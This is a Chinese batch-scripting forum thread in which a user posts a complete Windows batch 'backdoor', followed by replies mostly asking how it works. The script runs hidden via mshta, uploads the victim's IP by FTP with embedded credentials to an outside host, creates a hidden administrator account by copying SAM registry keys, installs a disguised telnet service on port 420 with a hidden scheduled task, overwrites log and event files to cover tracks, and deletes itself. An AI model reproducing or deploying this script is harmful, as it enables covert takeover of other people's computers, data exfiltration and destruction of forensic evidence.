标题: [网络工具] 闲来无事写了个批处理后门 [打印本页]
作者: lxzzr 时间: 2008-3-13 13:35 标题: 闲来无事写了个批处理后门
- @echo off
- cls
- if "%1" == "h" goto begin
- mshta vbscript:createobject("wscript.shell").run("""%~nx0"" h",0)(window.close)&&exit
- :begin
- time /t>>time.txt
- for /f "tokens=2 delims=:" %%a in (time.txt) do set ip=%%a
- del time.txt /q
- ipconfig>>ipconfig.txt
- for /f "tokens=15" %%i in ('find "IP Address" ipconfig.txt') do echo %%i>>ip.txt
- echo open lxz.0moola.com 21>a
- echo lxz.0moola.com>>a
- echo 1052104151>>a
- echo bin>>a
- echo put ip.txt /IP/%ip%.txt>>a
- echo by>>a
- ftp.exe -s:a
- del ipconfig.txt /q
- del ip.txt /q
- del a /q
- sc config Schedule start= auto
- net start schedule
- schtasks /create /tn Monitor /tr %SystemRoot%\system32\inetser.bat /sc onlogon /ru system
- echo inetscr.exe -s:%SystemRoot%\system32\a >>%SystemRoot%\system32\inetser.bat
- echo open 本机IP 端口>%SystemRoot%\system32\a
- copy %SystemRoot%\system32\ftp.exe %SystemRoot%\system32\inetscr.exe
- attrib +s +h %SystemRoot%\system32\a
- attrib +s +h %SystemRoot%\system32\inetscr.exe
- attrib +s +h %SystemRoot%\tasks\Monitor.job
- reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v forceguest /f /t REG_DWORD /d 00000000
- echo Windows Registry Editor Version 5.00 >>c:\h.reg
- echo. >>c:\h.reg
- echo [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\lxz$] >>c:\h.reg
- echo @=hex(1f7): >>c:\h.reg
- echo regedit /s c:\h.reg >>c:\h.bat
- echo del c:\h.reg /q >>c:\h.bat
- echo REG add HKLM\SAM\SAM\Domains\Account\Users\000001F7 >>c:\h.bat
- echo REG COPY HKLM\SAM\SAM\Domains\Account\Users\000001F4 HKLM\SAM\SAM\Domains\Account\Users\000001F7 /s /f >>c:\h.bat
- echo net user lxz$ lxz>>c:\h.bat
- echo del c:\h.bat /q >>c:\h.bat
- at 10:00 c:\h.bat
- schtasks /run /tn at1
- schtasks /run /tn Monitor
- tlntadmn config sec = -ntlm
- tlntadmn config port = 420
- copy %SystemRoot%\system32\tlntsvr.exe %SystemRoot%\system32\inetsvr.exe
- attrib +s +h %SystemRoot%\system32\inetsvr.exe
- echo [Version] >>c:\inetsvr.inf
- echo Signature="$WINDOWS NT$" >>c:\inetsvr.inf
- echo [DefaultInstall.Services] >>c:\inetsvr.inf
- echo AddService=inetsvr,,My_AddService_Name >>c:\inetsvr.inf
- echo [My_AddService_Name] >>c:\inetsvr.inf
- echo DisplayName=Windows Internet Service >>c:\inetsvr.inf
- echo Description=提供对 Internet 信息服务管理的支持。>>c:\inetsvr.inf
- echo ServiceType=0x10 >>c:\inetsvr.inf
- echo StartType=2 >>c:\inetsvr.inf
- echo ErrorControl=0 >>c:\inetsvr.inf
- echo ServiceBinary=%SystemRoot%\system32\inetsvr.exe >>c:\inetsvr.inf
- rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:\inetsvr.inf
- del c:\inetsvr.inf /q
- net start inetsvr
- net stop schedule
- for /r %%a in (*.txt) do find "本机IP" >nul %%a && echo 1980>%%a
- for /r %%b in (*.log) do find "本机IP" >nul %%b && echo 1980>%%b
- for /r %%c in (*.evt) do find "本机IP" >nul %%c && echo 1980>%%c
- for /r %%d in (*.event) do find "本机IP" >nul %%d && echo 1980>%%d
- net start schedule
- schtasks /delete /tn at1 /f
- del %0 /q
- del lxz.bat /q
复制代码
作者: 随风 时间: 2008-3-13 16:11
请用[ code] 和 [/code] 标记把代码部分首尾括起来,以便他人复制;
作者: tornodo 时间: 2008-3-15 21:48
看不懂啊,慢慢研究下。
作者: hu147 时间: 2010-11-7 18:33 标题: 看不懂啊,慢慢研究下。
看不懂啊,慢慢研究下。
作者: hotbooy 时间: 2010-11-16 11:57
有点晕晕的,,,,不过,,我知道,,,这是个高手,,,,
作者: fweiger 时间: 2011-1-2 05:58
看了下 懂了部分! 但是批处理想导入注册表成功的概率似乎,(ps 特别的有杀毒软件的,我用批处理修改显隐属性,360就会弹对话框! 我郁闷!)
另外我看到您在安装inf的时候 使用的是 128
- rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:\inetsvr.inf
复制代码
之前在百度查找到的方法是132的 不知道这个数字不同有什么区别!?
非常感谢
作者: FenoX 时间: 2022-12-17 20:38
怎么用嘞???
欢迎光临 批处理之家 (http://bathome.net./) |
Powered by Discuz! 7.2 |